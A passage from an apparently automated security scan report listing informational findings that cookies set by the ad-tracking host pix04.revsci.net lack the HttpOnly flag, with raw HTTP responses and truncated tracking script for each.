Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/669682607.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yFSaGM1VkTLa+A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7OC9yFSaGM1VkTLa+A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:14 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:13:14 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.387. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/686809393.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7MC90GTCMM0VkS2a+I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7MC90GTCMM0VkS2a+I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:16:39 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:16:38 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.388. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/686809393.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0DSCeM1VkQwa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:08 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0DSCeM1VkQwa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:08 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:07 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.389. http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/70794208.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyHSCCM0VkQwa9Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:14 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyHSCCM0VkQwa9Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:14 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:13 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.390. http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/715159401.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkfAbX+cer9duzVms+JZMi; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkfAbX+cer9duzVms+JZMi; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:23 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.391. http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/72215668.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV0HTySI1VkQ4a9A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:59 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6493&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV0HTySI1VkQ4a9A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:59 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6493&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:59 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.392. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/725558049.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl6CzycM1VkQna+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:07 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649b&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl6CzycM1VkQna+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:07 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649b&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:07 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:07 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.393. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/725558049.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFek+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICZwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4ekQFKVzWiMHf/qOY/QXNYa+cLbu/9VZ8kRAQYWrJq/kihnU2RBCuH1K1+fFRUwa7mP5BG9aL0q0hgJSjbS1BrfMo+mR4JdbBcmaGrhNgUzZt5VieerO4+OlKFXeBU9wSUxL5nM7/mfO2Yhj4+eD2WcwbQPAGA==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:54 GMT; Path=/
rtc_0=MLsvsNUvcS5nJgFEV8O6cA+G4idxFuQPjAyWrSbmZ3Tbl2Rd84FlLVUcISRc/FsFPa8heywhNNg5oFbPl3F4dMO1sqcRu9XvUH6T+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zRL+mPOkQo5u7ZqcIkcvVGKIHC87XbFyPcMgOVI28QjWTCBD7gxqlIHS30QpvQ23aySIZt5ZxD55Z2c2GGfqWfBB6nr8wTvbeVNSkATrp9p3laMToYhkfC7XcQCg1sRH6YdvSsYEoFIsVF5hdhhIgDfYapTcthUYv2wg5i1ihR2cqliV1Zn67wjWxNJuVi6joDXBNdhcMPCFqKzLLKTl4ZuhIeYoc9iXeucply5kFJgfG2imXDzFbc7uGwNb8HtbLXtXcaj5yx988Z002RRxTALk7uCob6xDvhIj76C4h3+AECWUFcJk3GJdmjVDlQw==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:54 GMT; Path=/
NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:14:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.394. http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/737191144.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uCTaGM1VkQLa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uCTaGM1VkQLa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:22 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.395. http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/769036262.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDTSKI0VkTwa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDTSKI0VkTwa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:25 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.396. http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/814275397.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uDSSaM0VkQaa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:22 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uDSSaM0VkQaa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:22 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:21 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.397. http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/844309645.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl2ESSWI1VkRja8M=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:10 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl2ESSWI1VkRja8M=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:10 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:10 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:09 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
